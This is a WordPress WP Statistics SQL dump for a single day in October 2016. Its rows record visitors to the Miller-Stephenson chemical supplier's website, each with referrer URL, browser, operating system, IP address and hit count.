INSERT INTO `wp_statistics_visitor` VALUES (810, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '50.205.42.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (811, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (812, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (813, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.63.236.163', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (814, '2016-10-06', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiW4-icpMbPAhXGCsAKHR-FDH0QFgg5MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fvazo%2F&usg=AFQjCNHY9PYcotxzZs4ETcH5s9OXED1qqw', 'MSIE', 'Windows', '11.0', '', '10.21.25.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (815, '2016-10-06', 'https://localhost:5272/067R154L115A10020140825.xhtml', 'SynHttpClient-Built', 'Unknown', '5859', '', '67.154.115.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (816, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '180.191.134.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (817, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.174.165.148', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (818, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '75.78.103.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (819, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '152.179.60.78', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (820, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.183.169.152', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (821, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.116', '', '178.32.87.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (822, '2016-10-06', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.133.78.66', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (823, '2016-10-06', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '70.183.169.152', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (824, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '185.108.128.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (825, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (826, '2016-10-06', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '123.233.166.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (827, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '12.111.39.182', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (828, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.102', '', '162.243.2.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (829, '2016-10-06', 'https://www.google.co.th/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&sqi=2&ved=0ahUKEwjJ78TsqsbPAhVHwI8KHWW0COwQFgg_MAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resin-systems%2Fepikure-curing-agents%2Fepikure-3100-series-polyamides%2F&usg=AFQjCNGB1lo3zvIrPb3DKmji_15jUxqe7g&sig2=PnI1EBYsdAHYPgGLE5W7ng&bvm=bv.134495766,d.c2I', 'MSIE', 'Windows', '11.0', '', '223.24.114.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (830, '2016-10-06', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiG0uvNq8bPAhUBgSYKHS-DA3AQFghTMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-aut-2e45%2F&usg=AFQjCNHxsw5-DW4VBon0KzQBNU8o-HalPQ', 'MSIE', 'Windows', '11.0', '', '129.230.236.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (831, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '54.218.47.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (832, '2016-10-06', 'https://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjQ1M-urMbPAhWlBsAKHejoA5UQFgg4MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-58005%2F&usg=AFQjCNFqZx-AG-432zpwzwUKTqG9hBCZbQ&bvm=bv.134495766,d.d24', 'MSIE', 'Windows', '11.0', '', '80.17.100.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (833, '2016-10-06', 'https://www.bing.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '183.45.42.134', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (834, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (835, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwif6sG7rcbPAhUI7CYKHRDGCdQQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '108.171.135.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (836, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (837, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (838, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '162.58.82.135', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (839, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '162.58.82.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (840, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '118.76.207.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (841, '2016-10-06', 'https://www.bing.com/search?q=miller+stephenson&form=IE9TR&src=IE9TR&pc=CMDTDFJS', 'MSIE', 'Windows', '11.0', '', '70.238.103.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (842, '2016-10-06', 'https://accessintelligence.imirus.com/Mpowered/book/vchei16/i9/p88', 'Chrome', 'Windows', '53.0.2785.143', '', '181.52.158.246', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (843, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '111.93.191.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (844, '2016-10-06', 'https://www.spacetechexpo.com/visit/exhibitor-list-2016', 'Firefox', 'Windows', '49.0', '', '106.51.133.34', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (845, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '60.13.214.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (846, '2016-10-06', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (847, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (848, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '189.252.72.182', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (849, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '217.88.254.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (850, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '204.13.37.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (851, '2016-10-06', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (852, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjy4erOtsbPAhWBLcAKHRZSBo0QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.ZGg', 'MSIE', 'Windows', '11.0', '', '216.234.125.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (853, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwj5t-vStsbPAhXLGCwKHZf5DxcQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.bGg', 'MSIE', 'Windows', '11.0', '', '209.87.117.16', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (854, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.95.121.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (855, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjsv8PptsbPAhXMWywKHd5ODk0QFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.bGg', 'MSIE', 'Windows', '11.0', '', '209.87.117.11', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (856, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.72.7.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (857, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.56.186.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (858, '2016-10-06', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwj5yvO7uMbPAhUHCGkKHUaLBrAYABAA&sig=AOD64_0rVUvSzEJDkMN3U2ZcPXCGpNkGnw&rct=j&q=&ved=0ahUKEwiSuPC7uMbPAhVq54MKHRKsAiUQ0QwIXg&adurl=', 'MSIE', 'Windows', '11.0', '', '65.95.107.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (859, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '173.73.116.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (860, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '38.100.21.69', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (861, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '204.128.192.32', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (862, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '164.76.48.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (863, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '185.30.91.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (864, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.47.35.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (865, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (866, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '165.156.24.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (867, '2016-10-06', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (868, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.234.241.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (869, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '198.208.251.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (870, '2016-10-06', 'https://www.google.es/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&sqi=2&ved=0ahUKEwi3tYyEvsbPAhWCzxQKHaHuA_EQFgg6MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-105%2F&usg=AFQjCNE7fDUZYvw1vi_-WJ_5lLxrv9GE4g&sig2=pYC-xmX9qqB9MA7YxSB_3Q&bvm=bv.134495766,d.d24', 'MSIE', 'Windows', '11.0', '', '194.179.51.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (871, '2016-10-06', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '109.108.159.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (872, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '192.150.0.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (873, '2016-10-06', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '47.138.212.52', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (874, '2016-10-06', 'https://us.wow.com/search?q=Miller+Stephenson+Distributors&s_chn=211&s_pt=aolsem&v_t=aolsem&s_it=rs-mid', 'MSIE', 'Windows', '11.0', '', '74.79.26.124', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (875, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.160.126.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (876, '2016-10-06', 'https://www.miller-stephenson.com', 'curl', 'Unknown', '7.38.0', '', '144.76.14.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (877, '2016-10-06', 'https://www.google.com/search?sourceid=chrome&ie=UTF-8&q=content', 'Unknown', 'Unknown', 'Unknown', '', '144.76.14.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (878, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '54.191.92.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (879, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.64.152.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (880, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '162.58.82.135', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (881, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '198.177.184.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (882, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '212.88.21.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (883, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '73.232.31.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (884, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.198.86.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (885, '2016-10-06', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1200.OCSfa6smM1dk5eUVKP4ldybOSlQQivF8XZdIX90w498mEd5zzK83xmbyBKkOGZ6w.9c131da9226c95d56d4419999a57775602f75980&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOWJFcXJBLTUzLUdoNllPMWN3QmkwTUhaR3FpOThISXRUVXBTaXlnQ3dJN2ZLc2JqOU9UMEhqZ1h3bnI4WFlqSG9Rck5qOXc1amM4bw&b64e=2&sign=10d05514398d13922fa7ed887a22d022&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTuzTJbKgtY2GzOa22RG9M2rejRojoiMxqkPHNOXDWqjPAb05BMGtkrYpO0GuunxErQPDJsDYvDLMdEASQ8llry6P-8i__4hmP5jKYJ4DjGCGOfEsXcBIkajJjfUG-0mSo&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4WEbtZQlMJq5rYC2EYE6TO7mdmHhec_Wmelq1__U4tDkmajWhn1tfoPdR9_hNlb1yOTDWFDOhqmKsz9YQLC6pfI&l10n=ru&cts=1475765598655&mc=6.0645271999', 'MSIE', 'Windows', '10.0', '', '5.166.128.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (886, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.209.148.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (887, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjMmL-QxsbPAhWMI4EKHfS6CgMYABAA&sig=AOD64_3Z7iAbOhp4d0GIxNG_dR22SWAxOg&rct=j&q=&ved=0ahUKEwiI8rqQxsbPAhVFOT4KHY8tCKEQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '67.84.143.130', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (888, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.99.200.65', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (889, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjth7-xx8bPAhUL9mMKHVdvAOAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '128.170.224.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (890, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '122.177.171.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (891, '2016-10-06', 'https://cheap-pills-norx.com/', 'MSIE', 'Windows', '6.0', '', '37.115.187.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (892, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '24.240.128.139', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (893, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '170.225.31.132', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (894, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.140.214.162', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (895, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '48.0.2564.97', '', '40.128.104.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (896, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.241.197.110', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (897, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjjnb-MzsbPAhWPNoEKHWsmB9EYABAK&sig=AOD64_2dy9mmtant-uKeC9qSUOAmhHwYmA&rct=j&q=&ved=0ahUKEwiErruMzsbPAhXFOSYKHZdJBAAQ0QwIOQ&adurl=', 'MSIE', 'Windows', '11.0', '', '173.13.84.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (898, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '204.210.172.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (899, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (900, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (901, '2016-10-06', 'https://www.bing.com/search?q=krytox+240AC+technical+data&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (902, '2016-10-06', 'https://www.miller-stephenson.com/product/krytox-240ac/', 'MSIE', 'Windows', '9.0', '', '204.79.180.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (903, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (904, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwjx2K2D0cbPAhUBXiYKHXrkDHsQFggoMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (905, '2016-10-06', 'https://www.google.com.eg/', 'Chrome', 'Android', '28.0.1500.94', '', '196.130.63.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (906, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '189.176.211.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (907, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '71.253.123.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (908, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj-4pus08bPAhWSiX4KHfFqBYEYABAA&sig=AOD64_2I9q6qflkXgqjEfV6LwQzZtcu9Tw&rct=j&q=&ved=0ahUKEwiYwJis08bPAhVmF2MKHSdhB2UQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '10.8.20.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (909, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.11.206.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (910, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (911, '2016-10-06', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.70.204.250', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (912, '2016-10-06', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjqopyd1cbPAhUPq2kKHYnKDNgYABAA&sig=AOD64_0e6BZtJOeoJSuUbHwJQ_U8RDZTCg&rct=j&q=&ved=0ahUKEwj_ypmd1cbPAhUh9IMKHeknB2kQ0QwIGg&adurl=', 'Firefox', 'Windows', '31.0', '', '199.185.191.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (913, '2016-10-06', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '65.69.80.190', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (914, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjI0My61cbPAhWBEIEKHeMEBjYYABAA&sig=AOD64_0Dl1a2wCawKTIVHU6XG90vf1ESyA&rct=j&q=&ved=0ahUKEwj9i8m61cbPAhUI4CYKHQkzC-UQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.61.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (915, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjI0My61cbPAhWBEIEKHeMEBjYYABAA&sig=AOD64_0Dl1a2wCawKTIVHU6XG90vf1ESyA&rct=j&q=&ved=0ahUKEwj9i8m61cbPAhUI4CYKHQkzC-UQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.61.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (916, '2016-10-06', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;yYU8czAlcIXT1ukoRBSWta78TzOfcQQlb6GaMeUX24E=', 'MSIE', 'Windows', '11.0', '', '132.3.61.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (917, '2016-10-06', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.57.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (918, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.22.76.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (919, '2016-10-06', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.57.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (920, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/', 'MSIE', 'Windows', '11.0', '', '132.3.61.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (921, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/', 'MSIE', 'Windows', '11.0', '', '132.3.57.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (922, '2016-10-06', 'https://r.search.yahoo.com/_ylt=AwrTccMth_ZXXq4ArkUXFwx.;_ylu=X3oDMTByaDNhc2JxBHNlYwNzcgRwb3MDMQRjb2xvA2dxMQR2dGlkAw--/RV=2/RE=1475803054/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=we9NKhO_2LdQxcySGhV6G1hfPuc-', 'MSIE', 'Windows', '11.0', '', '192.197.128.19', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (923, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.101.140.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (924, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '52.90.241.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (925, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '189.176.211.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (926, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwib77TW2MbPAhUM84MKHV23AykQFghLMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ&sig2=Q7UMyZgeVvGbggPeRPeuxw', 'MSIE', 'Windows', '11.0', '', '144.191.148.7', '000', 6, 0); 
